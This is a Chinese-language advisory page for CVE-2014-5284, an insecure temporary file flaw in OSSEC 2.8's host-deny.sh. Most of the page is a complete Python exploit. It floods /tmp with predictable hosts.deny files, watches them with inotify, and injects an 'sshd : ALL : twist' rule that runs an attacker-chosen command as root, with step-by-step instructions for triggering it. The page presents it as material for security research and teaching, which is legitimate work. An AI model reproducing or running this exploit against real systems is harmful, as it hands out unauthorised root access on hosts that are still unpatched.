OSSEC不安全临时文件创建漏洞(CVE

发布日期:2014-09-09
更新日期:2014-12-12

受影响系统:
OSSEC OSSEC 2.8
描述:
BUGTRAQ  ID: 70149
 CVE(CAN) ID: CVE-2014-5284

OSSEC是开源的基于主机的入侵检测系统。

OSSEC 2.8.1之前版本中,host-deny.sh用可预测的文件名写入到临时文件,而不验证所有权,这可使本地用户修改hosts.deny的访问限制,在执行自动IP封锁之前创建临时文件而获取root权限。

<*来源:Jeff Petersen
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/Python
 # Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation
 # Date: 14-11-14
 # Exploit Author: skynet-13
 # Vendor Homepage:
 # Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz
 # Version: OSSEC  - 2.8
 # Tested on: Ubunutu x86_64
 # CVE : 2014-5284

# Created from Research by
 # Jeff Petersen
 # Roka Security LLC
 # jpetersen@rokasecurity.com
 # Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1

# Run this on target machine and follow instructions to execute command as root

from twisted.internet import inotify
 from twisted.python import filepath
 from twisted.internet import reactor
 import os
 import optparse
 import signal


 class HostDenyExploiter(object):

def __init__(self, path_to_watch, cmd):
        self.path = path_to_watch
        self.notifier = inotify.INotify()
        self.exploit = cmd

def create_files(self):
        print "=============================================="
        print "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..."

for i in range(300, 65536):
            filename = "/tmp/hosts.deny.%s" % i
            f = open(filename, 'w')
            f.write("")
            f.close()

def watch_files(self):
        print "=============================================="
        print "Monitoring tmp for file change...."
        print "ssh into the system a few times with an incorrect password"
        print "Then wait for up to 10 mins"
        print "=============================================="
        self.notifier.startReading()
        self.notifier.watch(filepath.FilePath(self.path), callbacks=[self.on_file_change])

def write_exploit_to_file(self, path):
        print 'Writing exploit to this file'
        f = open(str(path).split("'")[1], 'w')
        f.write(' sshd : ALL : twist %s \n' % self.exploit)
        f.close()
        print "=============================================="
        print " ssh in again to execute the command"
        print "=============================================="
        print "              End Prog."
        os.kill(os.getpid(), signal.SIGUSR1)

def on_file_change(self, watch, path, mask):
        print 'File: ', str(path).split("'")[1], ' has just been modified'
        self.notifier.stopReading()
        self.write_exploit_to_file(path)


 if __name__ == '__main__':
    parser = optparse.OptionParser("usage of program \n" + "-c Command to run as root in quotes\n")
    parser.add_option('-c', dest='cmd', type='string', help='Used to specify a command to run as root')
    (options, args) = parser.parse_args()
    cmd = options.cmd
    if options.cmd is None:
        print parser.usage
        exit(0)
    ex = HostDenyExploiter('/tmp', cmd)
    ex.create_files()
    ex.watch_files()
    reactor.run()
    exit(0)

建议:
厂商补丁:

OSSEC
 -----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/b231a9dee487b3eb7c6abdd1f080a38e.html